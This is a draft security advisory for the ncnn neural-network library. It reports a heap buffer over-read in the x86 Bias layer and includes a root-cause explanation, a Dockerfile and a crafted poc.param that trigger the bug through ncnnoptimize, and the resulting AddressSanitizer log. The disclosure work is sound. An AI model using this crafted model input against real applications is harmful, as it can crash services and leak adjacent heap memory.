All advisories
Draft

Heap Buffer Over-Read in Bias Shape Inference

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Heap Buffer Over-Read in Bias Shape Inference

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/bias_x86.cpp:29 in Bias_x86::forward_inplace
Sanitizer verdict: heap-buffer-overflow

Summary

An attacker who can get ncnnoptimize (or any application calling ncnn::Net::load_model) to process a crafted .param/.bin pair can drive a heap out-of-bounds read of arbitrary length past a small weight allocation, terminating the process and folding adjacent heap words into the model that the optimizer writes out. The model declares a Bias layer whose bias_data_size is 1 while the upstream Input layer declares 32 channels. Bias_x86::forward_inplace sizes its loop from the runtime tensor's channel count but indexes the bias array with the same counter, so every channel past the first reads outside the one-element bias_data buffer. The entry point in the confirmed PoC is tools/ncnnoptimize, which loads the binary model at tools/ncnnoptimize.cpp:2797 and then runs ModelWriter::shape_inference().

Detail

The untrusted field is parameter key 0 of the Bias layer, stored as bias_data_size in Bias::load_param. It is used for exactly one thing: sizing the weight allocation in Bias::load_model, which calls mb.load(bias_data_size, 1) and hands back a Mat of that many floats. The loop bound in the x86 forward pass comes from a completely different source — bottom_top_blob.c, the channel count of the runtime tensor, which is derived from the Input layer's parameter key 2. Nothing in load_param, load_model, or the forward pass compares the two.

// src/layer/bias.cpp:21
int Bias::load_model(const ModelBin& mb)
{
    bias_data = mb.load(bias_data_size, 1);
    if (bias_data.empty())
        return -100;

    return 0;
}

// src/layer/x86/bias_x86.cpp:20
    int channels = bottom_top_blob.c;
    int size = w * h * d;

    const float* bias_ptr = bias_data;
    #pragma omp parallel for num_threads(opt.num_threads)
    for (int q = 0; q < channels; q++)
    {
        float* ptr = bottom_top_blob.channel(q);

        float bias = bias_ptr[q];

The PoC declares Input data 0 1 data 0=1 1=1 2=32 and Bias bias 1 1 data out 0=1, with a single float in poc.bin. Bias::load_model therefore calls Mat::create(1), which rounds cstep up to a 16-byte boundary and asks fastMalloc for 16 + 4 bytes; fastMalloc adds the NCNN_MALLOC_OVERREAD slack of 64 bytes, giving the 84-byte region ASan reports. Bias_x86::forward_inplace then runs q from 0 to 31. Reads for q in 1..20 stay inside the malloc'd block — they walk over the cstep padding, the refcount word at offset 16, and the over-read pad — so they are silently accepted and produce garbage bias values. At q == 21 the read lands at byte offset 84, exactly one past the end of the 84-byte region, and AddressSanitizer aborts.

In a non-instrumented build the loop keeps going to q == 31, adding 31 uninitialized or adjacent-heap floats to the output channels. Since ModelWriter::shape_inference() records each layer's output and ncnnoptimize then serializes the optimized model, those leaked values reach the attacker-visible output; on other heap layouts the same indexing reads an unmapped page and kills the process.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-over-read-in-bias-shape-inference && cd ncnn-poc-heap-buffer-over-read-in-bias-shape-inference

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'PARAM'
7767517
2 2
Input data 0 1 data 0=1 1=1 2=32
Bias bias 1 1 data out 0=1
PARAM

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50e000000094 at pc 0x5e93f4056ad8 bp 0x7ffccc3128d0 sp 0x7ffccc3128c0
READ of size 4 at 0x50e000000094 thread T0
    #0 0x5e93f4056ad7 in ncnn::Bias_x86_avx512::forward_inplace(ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/bias_x86_avx512.cpp:29
    #1 0x5e93f3f9efd8 in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:711
    #2 0x5e93f3f91b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #3 0x5e93f3ff19e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #4 0x5e93f3e833c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #5 0x5e93f3f00eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #6 0x73f19fe7d1c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #7 0x73f19fe7d28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #8 0x5e93f3e80624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x50e000000094 is located 0 bytes after 84-byte region [0x50e000000040,0x50e000000094)
allocated by thread T0 here:
    #0 0x73f1a04f6f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x5e93f3f4fbc5 in fastMalloc /ncnn/src/allocator.h:62
    #2 0x5e93f3f4fbc5 in ncnn::Mat::create(int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:331
    #3 0x5e93f3f84c1a in ncnn::ModelBinFromDataReader::load(int, int) const /ncnn/src/modelbin.cpp:309
    #4 0x5e93f40519b4 in ncnn::Bias::load_model(ncnn::ModelBin const&) /ncnn/src/layer/bias.cpp:23
    #5 0x5e93f3feca84 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2080
    #6 0x5e93f3f00c34 in main /ncnn/tools/ncnnoptimize.cpp:2793
    #7 0x73f19fe7d1c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #8 0x73f19fe7d28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x5e93f3e80624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/build/src/layer/x86/bias_x86_avx512.cpp:29 in ncnn::Bias_x86_avx512::forward_inplace(ncnn::Mat&, ncnn::Option const&) const

Credit

Zheng Yu @ DepthFirst